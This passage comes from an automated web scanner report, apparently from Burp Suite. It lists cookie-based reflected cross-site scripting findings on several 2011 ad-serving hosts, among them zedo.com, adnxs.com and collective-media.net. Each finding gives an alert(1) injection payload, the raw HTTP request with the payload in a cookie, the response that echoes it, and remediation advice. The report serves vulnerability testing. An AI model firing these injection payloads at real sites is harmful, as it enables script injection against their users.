Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=14341e<script>alert(1)</script>faac9635f42; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
5207&arc=178113566&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "BMX_G": 'method->-1,ts->1304954985', "ar_s_p81479006": '14341e<script>alert(1)</script>faac9635f42', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...

2.157. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b78a"-alert(1)-"9b5e3cf9810 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~0423112b78a"-alert(1)-"9b5e3cf9810; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=157
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:12 GMT
Connection: close
Content-Length: 2010

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
AABN~0423112b78a"-alert(1)-"9b5e3cf9810';

var zzhasAd=undefined;


                                                                                                       var zzStr = "s=1;u=5ajh4goBADQAAFjiiCYAAABN~0423112b78a"-alert(1)-"9b5e3cf9810;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

2.158. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e3ff"-alert(1)-"a1e8393f137 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~0423111e3ff"-alert(1)-"a1e8393f137; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2052

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~0423111e3ff"-alert(1)-"a1e8393f137';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=5ajh4goBADQAAFjiiCYAAABN~0423111e3ff"-alert(1)-"a1e8393f137;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

2.159. http://ib.adnxs.com/acb [acb145072 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /acb

Issue detail

The value of the acb145072 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d50b6'%3balert(1)//f3c67e09f9f was submitted in the acb145072 cookie. This input was echoed as d50b6';alert(1)//f3c67e09f9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb145072=5_[r^kI/7ZVO@Lm*bfY>AYR8I?enc=FK5H4XoUCkBFtvP91HgHQAAAAKCZmfk_Rbbz_dR4B0AUrkfhehQKQNspbpGFnStGSsYda6b2ziUcCshNAAAAACgjBgA3AQAAHgAAAAMAAAAmSAUAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA3xABAgUCAAUAAAAAfyE2KQAAAAA.&tt_code=cm.rub_usatoday&click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf%26redirectURL=&pixel=http://va.px.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26creativeID=113105%26message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf%26managed=falsed50b6'%3balert(1)//f3c67e09f9f; sess=1; icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; uuid2=2724386019227846218; 
anj=Kfw)(CZ#0c)_VtN.!fFc)4A9CkOy>5#Y2:H9+'(s':?6bLT2bujaqZM1q=3$<oxAN2R+-Q=f*ZD9q01F/yR!pPep@lhr?6lR5#u^LepX@-Bq@%t>BCt6LR9nqEku7!%x^cbAH:CBp4SoB_g)flf'+AW^8$vA%+R@BlT0>Og>^(#8Df^Mjo0*A?Rk8fO`zgI/(/6j]*nXBx`1s6=M3kv/VxS`aeS9/q?'v_7C+:@wG$N2=H<:IL#14#$D?40tLzI7=H'2$jLWN7CRm/8$vYZ!X@-8eFH`<@QU6Hj+1jDBpEB`8OjKb'GjgX8RAnuKCH.)XGBs/J*S:!cS[S?s$.iZwpczluvIHD7:hcBh=OMr6>JCzU3a>.GYzcjXc/wl$jxr6gM]N:Juk`F$fOJ>VqTH878oNWsnzJf=VOiSkZWN62OH1jwf[jvq%+U<RPfFF?JO'GuCZTEo.S'$TmrW>o(Q%@XomCXfdO.cX7MxB^OTpJ)U_<-[pmSCx0$Tnvy]D=wvcAfmROfiaS6^vmJJpx.1]4YgsAD[$hbMf827(omrkIHMu4m(=%V4yO-<vwSX0@uimPr?_!$6mB1.>xJj+Km$psS8m[pFyvxb1!cI4mu./=I>2v+AHbIE.bvpEgK*U.!FLR(G7Qv#Y*

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb145072=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?Mc9aQ3p9'^<S@I)Ql?!>Ae1f''iDi%3^'oLfC].kus@gU@%TxzHNX4[`WiVr*#9$vly>pFw2R!S3(%@w4<XPfGwI=KFxaLe[#mlK'C6EcG7hQU*o4SxrFd%j8zSG'hZ^D=OGMdEBEY11Uo_(eivJEYD@Ho?(^)etsLR7z'ns49!Ux5mR>#lMG'iLd<GTD$#AwtORJ@vBPA8q:p2Hv8s$nLSw`@cT6'=rqvg/PJyYt[-L!L(s`](-sRB6bA$j7/8l`/qMkYNHmLjx!j+Cat8-(!nXx8T`oWuF:Y11:LvJSN%2pSV-#:g'=Sb.-<6h+YEM%gG@w_9^gcM7pD=!j6CenGiB7>kko?i=<)!e3YI4KDvQEb`X8)alPKr$ETqBnzTMkQg+%-)erfq'IW*l8wrT7cUm4]3SP4j+tx.U-$'YUm@*y6x(A3H+*S0$getvNu.MeHeUf-#2%G*>DY/A<By?VIzutD*g8cKK+`6>[DwWqbhOid^wC>`:mn[J>?-#Fp6<W)3Xikw.$@ePbWiO6d:_'xt%OTZIzzfW[Loft(ZmLx[_-MtHVG'T'sPt9ssVv3fjt4@6bcwvH%-]h'oo`t?2P/4nA!gq([Ift!^HL*Xe]Z0f#*hQ*v9^cJiiW^]P3'vI-$iNx:M; path=/; expires=Sun, 07-Aug-2011 15:37:21 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 15:37:21 GMT
Content-Length: 2869

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">function writeJS(doc){
var str='';
str += '<script type="text\/javascript"> \n';
...[SNIP]...
m/adnxs_imp?returnType=image&key=AdImp&cost=3.260000&creativeID=113105&message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf&managed=falsed50b6';alert(1)//f3c67e09f9f" width="1" height="1"/>
...[SNIP]...

2.160. http://ib.adnxs.com/acb [acb893170 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /acb

Issue detail

The value of the acb893170 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e655b'%3balert(1)//a0760bdba82 was submitted in the acb893170 cookie. This input was echoed as e655b';alert(1)//a0760bdba82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acb?member=311&width=728&height=90&pb=280&cb=2578662&referrer= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIhboCEAoYAiACKAIw4pSg7gQQ4pSg7gQYAQ..; acb893170=5_[r^kI/7ZVO@Lm*bfY>WiRT8?enc=FK5H4XoUCkBFtvP91HgHQAAAAKCZmfk_Rbbz_dR4B0AUrkfhehQKQFOF0tqw0VJASsYda6b2ziViCshNAAAAACgjBgA3AQAAHgAAAAMAAACHbQUAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA3xABAgUCAAUAAAAATCPKqQAAAAA.&tt_code=cm.rub_usatoday&click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizsOgEAIBa.yobaAfY8leKaNnZXx7kJiNTN8HgHkHEstjiGY7ZZuWWUVwgVmhk8qAGq4S1_2rqYaXf02i_6Txeveu3SVkm7vBykHFGc-%26redirectURL=&pixel=http://va.px.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26creativeID=114297%26message=eJwtizsOgEAIBa.yobaAfY8leKaNnZXx7kJiNTN8HgHkHEstjiGY7ZZuWWUVwgVmhk8qAGq4S1_2rqYaXf02i_6Txeveu3SVkm7vBykHFGc-%26managed=falsee655b'%3balert(1)//a0760bdba82; uuid2=2724386019227846218; anj=Kfw)(CZ#0s(F?MZ/Hw6M9'^<S2U@!:?!=5D/#m45DLc)]:#m<jG2QY%)hRUPZ6.4!Cb0i9=?30.f`PjN%)NSM//kC0GfkcGYCO$HhF^d['nn-tv@#2kF)yOv%i`W#'w@pXWlbX@KozXV?P%j2mWi''mY$RtWOF<qF)@r6l88[dN]UG=Cg'6e=Kr)o.lNx7D2455k84Xt8<q%R/M)Q=p!SOLo6tu%S_EeJ^:GYD4TUGhUm4.CNgIbZX.*re6y<W$9sinfkZpOX#nFRnlBD8wa<kDbX0b$=`p+d7!7BSY%A(+T1-o5S0z_Rd^<NMU_QC#:#.T^Pf$7NQIiv+vrUEZz?ev<SSWGAY$oK=Fv^a5y+e@0%>@s0.tp=06u`%C+I55#E`PitRt]Iybk+9_<RyC)=CdC*pD7Y?1ZyJIf.Td9aL+-m+X9eObnVw>-bFl([SwBJV$s(QxCPo=+Hxahx8F%6Up#-z[(vtS^9b>:Y8LjKq]1lgr4Gt2k:9?S<LQEXV.U+CsRZJJxfIcVy9O)ng(G7oG70.Svvb9D?J[!8F3#h)nmsRq!pN'v!t1(Wv+o8q!ljeG$lzm7.mX(XqI/.5#cJ*npWOxe@WJc(:Z?Glrik<f#h=MRDu^$G7q]fKvLsX*@iq2ohfr2k*HmPV[x.bB)wC$/+le_]y

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:39:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:39:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb893170=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:39:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?MZ/Hw6M9'^<S2U@!:?!=5D/#m45DLc)]:#m<jG2QY%)hRUPZ6.4!Cb0i9=?30.f`PjN%)NSM//kC0GfkcGYCO$HhF^d['nn-tv@#2kF)yOv%i`W#'w@pXWlbX@KozXV?P%j2mWi''mY$RtWOF<qF)@r6l88[dN]UG=Cg'6e=Kr)o.lNx7D2455k84Xt8<q%R/M)Q=p!SOLo6tu%S_EeJ^:GYD4TUGhUm4.CNgIbZX.*re6y<W$9sinfkZpOX#nFRnlBD8wa<kDbX0b$=`p+d7!7BSY%A(+T1-o5S0z_Rd^<NMU_QC#:#.T^Pf$7NQIiv+vrUEZz?ev<SSWGAY$oK=Fv^a5y+e@0%>@s0.tp=06u`%C+I55#E`PitRt]Iybk+9_<RyC)=CdC*pD7Y?1ZyJIf.Td9aL+-m+X9eObnVw>-bFl([SwBJV$s(QxCPo=+Hxahx8F%6Up#-z[(vtS^9b>:Y8LjKq]1lgr4Gt2k:9?S<LQEXV.U+CsRZJJxfIcVy9O)ng(G7oG70.Svvb9D?J[!8F3#h)nmsRq!pN'v!t1(Wv+o8q!ljeG$lzm7.mX(XqI/.5#cJ*npWOxe@WJc(:Z?Glrik<f#h=MRDu^$G7q]fKvLsX*@iq2ohfr2k*HmPV[x.bB)wC$/+le_]y; path=/; expires=Sun, 07-Aug-2011 15:39:01 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 15:39:01 GMT
Content-Length: 2748

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">function writeJS(doc){
var str='';
str += '<script type="text\/javascript"> \n';
...[SNIP]...
m/adnxs_imp?returnType=image&key=AdImp&cost=3.260000&creativeID=114297&message=eJwtizsOgEAIBa.yobaAfY8leKaNnZXx7kJiNTN8HgHkHEstjiGY7ZZuWWUVwgVmhk8qAGq4S1_2rqYaXf02i_6Txeveu3SVkm7vBykHFGc-&managed=falsee655b';alert(1)//a0760bdba82" width="1" height="1"/>
...[SNIP]...

2.161. http://k.collective-media.net/cmadj/cm.rub_usatoday/ [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rub_usatoday/

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1063'%3balert(1)//73c0ac01910 was submitted in the cli cookie. This input was echoed as d1063';alert(1)//73c0ac01910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rub_usatoday/;sz=728x90;net=cm;ord=[timestamp];env=ifr;ord1=310802;cmpgurl=http%253A//www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989ed1063'%3balert(1)//73c0ac01910; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:05 GMT
Connection: close
Set-Cookie: mmpg=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:37:05 GMT
Content-Length: 7736

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
